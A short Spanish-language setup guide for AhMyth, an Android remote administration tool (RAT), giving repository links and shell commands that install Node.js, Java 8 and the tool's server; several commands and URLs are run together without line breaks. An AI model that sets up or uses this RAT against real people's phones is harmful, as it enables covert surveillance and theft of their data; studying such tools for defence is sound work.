
Herramienta de Administración Remota de Android
https://github.com/AhMyth/AhMyth-Android-RAT.githttps://github.com/elcaza/AhMyth-Android-RATEste proyecto consiste de dos partes
git clone https://github.com/AhMyth/AhMyth-Android-RAT.gitcd AhMyth-Android-RAT/AhMyth-Servernpm start# Instalando dependencias del proyecto
sudo apt install -y nodejs npm git curl libgconf-2-4
# Instalando java 8
sudo apt install -y wget gnupg software-properties-common
wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | sudo apt-key add -
sudo add-apt-repository --yes https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/
sudo apt update -y
sudo apt install adoptopenjdk-8-hotspot -y
sudo update-alternatives --config java
# Aquí selecciona la que tenga el "8"
git clone https://github.com/elcaza/AhMyth-Android-RAT
cd AhMyth-Android-RAT/AhMyth-Server/
npm install
npm start
Web Server
Cliente